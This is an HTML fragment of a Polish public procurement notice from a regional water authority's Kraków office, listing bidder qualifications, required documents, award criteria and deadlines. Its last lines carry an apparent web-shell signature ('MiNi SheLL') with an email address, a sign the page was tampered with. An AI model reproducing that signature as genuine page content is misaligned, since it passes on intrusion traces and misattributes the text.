równoważne kwalifikacje, zdobyte w innych państwach, na zasadach określonych w art. 12a ustawy z dnia 7 lipca 1994r. Prawo budowlane, z uwzględnieniem postanowień ustawy z dnia 18 marca 2008r. o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (Dz. U. 2008, nr 63, poz. 
394 ze zm.) 
2.dysponują osobą  specjalista przyrodnik z doświadczeniem pracy w terenie, posiadający wiedzę i umiejętności rozpoznawania gatunków i siedlisk w szerokim zakresie, w tym szczególnie gatunków i siedlisk objętych ochroną i rzadkich ((dotyczy części zamówienia Nr 1 :zad 1,zad.2,Nr 2 zad.1,Nr 3 zad.1,zad.2,zad.3).Ocena spełnienia w.w.warunku na podstawie informacji zawartych w przedłożonych dokumentach.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczegółowych wymagań w tym zakresie i sposobu oceny</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.Wypełniony Formularz Oferty 2. Dokument ustanawiający Pełnomocnika do reprezentowania Wykonawców wspólnie ubiegających się o udzielenie niniejszego zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie niniejszego zamówienia publicznego - w przypadku, gdy Wykonawcy składają wspólną ofertę, 3. Stosowne pełnomocnictwo(a) potwierdzające, że dana osoba nie wymieniona w dokumencie rejestracyjnym prowadzonej działalności jest upoważniona do reprezentowania wykonawcy w postępowaniu. 4. Pisemne zobowiązanie innych podmiotów do oddania Wykonawcy do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia w sytuacji polegania przez Wykonawcę na wiedzy i doświadczeniu, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów 4.1. oświadczenie innego podmiotu o braku podstaw do wykluczenia z postępowania z powodu nie spełniania warunków, o których mowa w art. 24 ust. 1 Ustawy, zgodnie z drukiem stanowiącym załącznik do SIWZ; 4.2.dla weryfikacji osoby (reprezentacji) innego podmiotu podpisującej zobowiązanie aktualny odpis z właściwego rejestru lub centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 95</li>
<li>2 - warunki płatności - 5</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Wszelkie zmiany i uzupełnienia umowy mogą być dokonywane wyłącznie w formie pisemnego aneksu, podpisanego przez obie strony. 
2.	Z zastrzeżeniem formy przewidzianej w ust.1, Strony dopuszczają możliwość zmiany treści umowy w następującym zakresie: 
a) zmiany w KRS, wpisie do ewidencji działalności gospodarczej lub (CEIDG) w trakcie realizacji zamówienia.  
b) zmiany kont bankowych, 	 
c) wystąpienie oczywistych omyłek pisarskich  i rachunkowych w treści umowy. 
d) w przypadku ustawowej zmiany stawki podatku od towarów i usług na przedmiot umowy, cena brutto określona w umowie ulegnie odpowiedniej zmianie, przy czym cena netto pozostanie niezmieniona 
e) zmiany  terminu wykonania umowy z zastrzeżeniem ust. 3 
3. Zmiana terminów wykonania przedmiotu zamówienia będzie możliwa wyłącznie w przypadku zdarzeń losowych tj. podtopienia terenu robót, spowodowanego powodzią lub intensywnymi opadami deszczu tylko jeśli uniemożliwia to prowadzenie robót, bądź też wystąpienia innych okoliczności niezależnych od wykonawcy i udokumentowanych w formie pisemnej a mających wpływ na termin realizacji przedmiotu umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.mzmiuw.krakow.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> MZMiUW Inspektorat Rejonowy w Krakowie ul.Kraszewskiego 36 30-110 Kraków pokój 32A.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 21.04.2016 godzina 08:00, miejsce: MZMiUW Inspektorat Rejonowy w Krakowie ul.Kraszewskiego 36 30-110 Kraków pokój 32A.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com